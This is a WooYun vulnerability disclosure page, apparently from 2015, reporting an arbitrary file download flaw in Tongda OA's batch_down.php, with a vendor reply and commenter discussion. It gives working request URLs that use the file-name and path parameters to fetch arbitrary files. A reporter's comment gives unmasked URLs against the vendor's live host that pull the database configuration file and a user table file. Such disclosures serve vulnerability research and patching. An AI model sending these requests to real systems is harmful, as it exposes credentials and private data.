当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157564

漏洞标题:通达OA任意文件下载漏洞

相关厂商:通达信科

漏洞作者: list

提交时间:2015-12-03 17:13

修复时间:2015-12-17 14:48

公开时间:2015-12-17 14:48

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:13

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-03: 厂商已经确认,细节仅向厂商公开
2015-12-06: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2016-01-27: 细节向核心白帽子及相关领域专家公开
2016-02-06: 细节向普通白帽子公开
2016-02-16: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

通达OA任意版本任意文件下载漏洞,可以下载电脑上任意文件。
官网最新版作演示:

详细说明:

正常下载图片:
http://**.**.**.**/general/picture/batch_down.php?TmpFileNameStr=DSCN0292.jpg|@~@&SUB_DIR=&PIC_PATH=d:/myoa/%D4%B1%B9%A4%BB%EE%B6%AF

oa1.png

oa2.png

oa3.png


修改路径下载文件:
下载index.php:
http://**.**.**.**/general/picture/batch_down.php?TmpFileNameStr=index.php|@~@&SUB_DIR=&PIC_PATH=d:/myoa/webroot

oa4.png

oa5.png

oa6.png


下载cmd.exe:
http://**.**.**.**/general/picture/batch_down.php?TmpFileNameStr=cmd.exe|@~@&SUB_DIR=&PIC_PATH=c:/windows/system32

oa7.png

oa8.png

漏洞证明:

如上。

修复方案:

无。

版权声明:转载请注明来源 list@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-12-03 17:17

厂商回复:

需要知道文件名和路径。

最新状态:

暂无


漏洞评价:

评价

  1. 2015-12-04 02:52 | list ( 实习白帽子 | Rank:68 漏洞数:13 )

    对厂商给分有异议。什么叫做要知道文件名和路径。你们这玩意儿安装个不就可以看路径么?看我下载你们数据库配置文件:http://oa.tongda2000.com/general/picture/batch_down.php?TmpFileNameStr=oa_config.php|@~@&SUB_DIR=&PIC_PATH=d:/myoa/webroot/inc/下载数据库:http://oa.tongda2000.com/general/picture/batch_down.php?TmpFileNameStr=user.frm|@~@&SUB_DIR=&PIC_PATH=d:/myoa/data5/TD_OA

  2. 2015-12-07 21:57 | 幻老头儿 ( 普通白帽子 | Rank:220 漏洞数:50 | 新手上路。)

    @list 需要登录吧?

  3. 2015-12-08 16:08 | list ( 实习白帽子 | Rank:68 漏洞数:13 )

    @幻老头儿 如果不能下就需要登录。

  4. 2015-12-08 16:23 | 幻老头儿 ( 普通白帽子 | Rank:220 漏洞数:50 | 新手上路。)

    @list 我看源码中是有session验证的。哈哈

  5. 2015-12-08 16:23 | 幻老头儿 ( 普通白帽子 | Rank:220 漏洞数:50 | 新手上路。)

    @list 如果可以绕过session,那就为所欲为了。

  6. 2015-12-28 17:27 | 独角兽 ( 路人 | Rank:11 漏洞数:6 | 无)

    确实存在,不过user.frm下载后无法正常读取,本地搭建覆盖,单独调用。均失败!